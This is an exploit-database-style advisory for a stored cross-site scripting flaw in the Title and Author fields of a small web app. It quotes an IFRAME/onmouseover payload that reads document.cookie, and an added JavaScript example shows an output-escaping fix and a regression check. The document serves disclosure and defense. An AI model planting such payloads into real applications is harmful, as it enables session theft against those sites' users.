Book Recording App 2024-09-24 Cross Site Scripting
Book Recording App, as submitted on 2024-09-24, suffers from a persistent cross site scripting vulnerability.
# Exploit Title: Book Recording App - Cross Site Scripting (Stored XSS)
# Date: 05/10/2024
# Exploit Author: Arif Ari
# Vendor Homepage: https://www.sourcecodester.com/javascript/17600/book-recording-app-using-htmlcss-vanillajs-source-code.html
# Software Link: https://www.sourcecodester.com/download-code?nid=17600&title=Book+Recording+App+using+HTML%26CSS+in+VanillaJS+with+Source+Code
# Tested on: Windows / XAMPP

# The Title and Author parameters are vulnerable to stored XSS. You can trigger the vulnerability with this XSS payload:
# <IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>

####### Raw URL #######
# http://localhost/book-recording-app-using-html-css-in-vanillajs/#
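
The flaw and its fix, as an added defensive example that is not taken from the advisory or from the app's source: it assumes the app writes stored Title and Author values into the page as HTML, and every function name below is hypothetical.

```javascript
// Added example. renderRowUnsafe, renderRowSafe, escapeHtml and
// containsActiveMarkup are hypothetical names, not the app's own code.

const HTML_ESCAPES = {
  "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;",
};

// Encode a value for the HTML text/attribute context.
function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Vulnerable pattern (assumed): stored fields are concatenated into markup
// as-is, so any tag saved in Title or Author is parsed on every page view.
function renderRowUnsafe(book) {
  return `<tr><td>${book.title}</td><td>${book.author}</td></tr>`;
}

// Hardened pattern: every stored field is encoded at output time.
// In the browser, assigning the value to cell.textContent has the same effect.
function renderRowSafe(book) {
  return `<tr><td>${escapeHtml(book.title)}</td><td>${escapeHtml(book.author)}</td></tr>`;
}

// Regression check: true if the rendered row contains any tag other than
// the <tr>/<td> wrappers the template itself emits.
function containsActiveMarkup(html) {
  const withoutRowTags = html.replace(/<\/?(tr|td)>/g, "");
  return /<[a-z!\/]/i.test(withoutRowTags);
}

// Constructed sample record; the title is the payload quoted in the advisory.
const stored = {
  title: '<IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>',
  author: "O'Brien & Sons",
};

console.log("unsafe row carries live markup:", containsActiveMarkup(renderRowUnsafe(stored)));
console.log("safe row carries live markup:  ", containsActiveMarkup(renderRowSafe(stored)));
console.log(renderRowSafe(stored));
```

Encoding at output time also neutralizes records that were saved before the fix, which filtering input at submission alone would not.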